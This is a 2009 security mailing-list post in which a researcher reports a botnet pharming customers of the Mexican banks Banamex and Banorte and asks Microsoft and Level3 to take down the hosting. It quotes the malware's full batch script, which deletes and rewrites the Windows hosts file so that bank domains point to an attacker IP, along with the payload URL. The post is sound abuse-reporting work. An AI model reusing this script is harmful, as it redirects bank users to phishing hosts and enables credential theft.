[nsp-sec] Ping Level3, Microsoft (Livefilestore.com) - banamex pharming
jose nazario
jose at arbor.net
Fri Mar 13 09:51:50 EDT 2009
Found this via shadowserver, a botnet doing pharming against Banamex:
URL (ping MSFT):
http://lrqiyw.bay.livefilestore.com/y1p1y2FN5A1m39_LYf7CjPj4AXbz9UPENMlTDif
vrzr4jBV2-cCtl7qWaZ-h3u1jRZ4typbivxUAtPP4uBmte245w/hotb.txt
contents:
attrib -r %windir%\system32\drivers\etc\hosts
del %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.banorte.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.banorte.com >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 banorte.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 banorte.com >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.banamex.com.mx >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 banamex.com >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.banamex.com >> %windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.bancanetempresarial.banamex.com.mx >>
%windir%\system32\drivers\etc\hosts
echo 8.14.230.179 bancanetempresarial.banamex.com.mx >>
%windir%\system32\drivers\etc\hosts
echo 8.14.230.179 boveda.banamex.com.mx >>
%windir%\system32\drivers\etc\hosts
echo 8.14.230.179 www.boveda.banamex.com.mx >>
%windir%\system32\drivers\etc\hosts
attrib +r %windir%\system32\drivers\etc\hosts
AS | IP | AS Name
594 | 8.14.230.179 | LVLT594-598 - Level 3 Communications, Inc.
You've got a pharming host.
-- jose
-------------------------------------------------------------
jose nazario, ph.d. <jose at arbor.net>
Arbor Networks www.arbornetworks.com
v: (734) 821 1427
PGP: 0x40A7BF94
-------------------------------------------------------------
More information about the nsp-security
mailing list